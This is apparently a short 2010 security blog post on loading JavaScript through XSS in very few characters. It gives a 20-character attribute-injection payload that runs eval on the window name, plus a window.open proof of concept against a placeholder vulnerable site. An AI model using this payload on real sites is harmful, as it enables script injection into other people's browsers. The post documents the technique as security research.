"onfocus="eval(name)
window.open('http://some.site.com/with/xss/vulns?input="onfocus="eval(name)', "alert('xss')")
Wednesday, January 13, 2010
XSS and Ultra Short Urls II
Since I've written the first post about my efforts to load external javascript in under 30 characters, I've learned several new tricks to reference "external" javascript. The shortest one is this (20 characters):
This will only work if the window's name property has been set to hold your "external" javascript:
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment